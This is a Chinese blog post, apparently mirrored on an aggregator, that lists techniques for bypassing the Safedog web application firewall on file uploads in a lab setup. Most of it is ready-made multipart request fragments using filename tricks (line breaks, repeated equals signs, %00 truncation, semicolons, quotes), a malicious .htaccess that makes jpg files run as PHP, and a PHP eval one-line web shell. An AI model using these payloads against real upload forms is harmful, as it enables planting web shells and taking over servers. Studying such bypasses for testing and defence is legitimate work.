zoukankan      html  css  js  c++  java
  • 文件上传绕过WAF

    文件上传

    文件上传实质上还是客户端的POST请求,消息主体是一些上传信息。前端上传页面需要指定
    enctype为multipart/from-data才能正常上传文件。
    

    此处不讲各种中间件解析漏洞只列举集几种safe_dog对脚本文件上传拦截的绕过
    靶机环境:win2003+safe_dog4.0.23957+webug中的上传

    1、换行

    Content-Disposition: form-data; name="file"; filename="1.p
    hp"
    Content-Type: image/jpeg
    <?php @eval($_POST[1])?>
    -----------------------------127619278770
    

    2、多个等号(不止2,3个)

    Content-Disposition: form-data; name="file"; filename=="2.php"
    Content-Type: image/jpeg
    <?php @eval($_POST[1])?>
    -----------------------------127619278770
    

    Content-Disposition: form-data; name="file"; filename==="3.php"
    Content-Type: image/jpeg
    <?php @eval($_POST[1])?>
    -----------------------------127619278770
    

    3、00截断

    Content-Disposition: form-data; name="file"; filename="4.php%00"
    Content-Type: image/jpeg
    <?php @eval($_POST[1])?>
    -----------------------------127619278770
    

    4、文件名+;号

    Content-Disposition: form-data; name="file"; filename="6;.php"
    Content-Type: image/jpeg
    <?php phpinfo()?>
    -----------------------------127619278770
    


    5、文件名+‘

    Content-Disposition: form-data; name="file"; filename="7'.php"
    Content-Type: image/jpeg
    <?php phpinfo()?>
    -----------------------------127619278770
    


    6、上传.htaccess

    Content-Disposition: form-data; name="file"; filename=".htaccess"
    Content-Type: image/jpeg
    AddType application/x-httpd-php jpg
    -----------------------------127619278770
    



  • 相关阅读:
    正则表达式元字符完整列表及行为说明
    吐槽满肚子的负能量
    又一个月了
    关于SVNcommit时强制写注释方法
    SVN源码服务器搭建
    一个 quick set 驱动费了我一下午
    spring自动注入是单例还是多例?单例如何注入多例?
    web.xml 中的listener、 filter、servlet 加载顺序及其详解
    springmvc+hibernate
    oracle 表 库实例 空间
  • 原文地址:https://www.cnblogs.com/cwkiller/p/11651054.html
Copyright © 2011-2022 走看看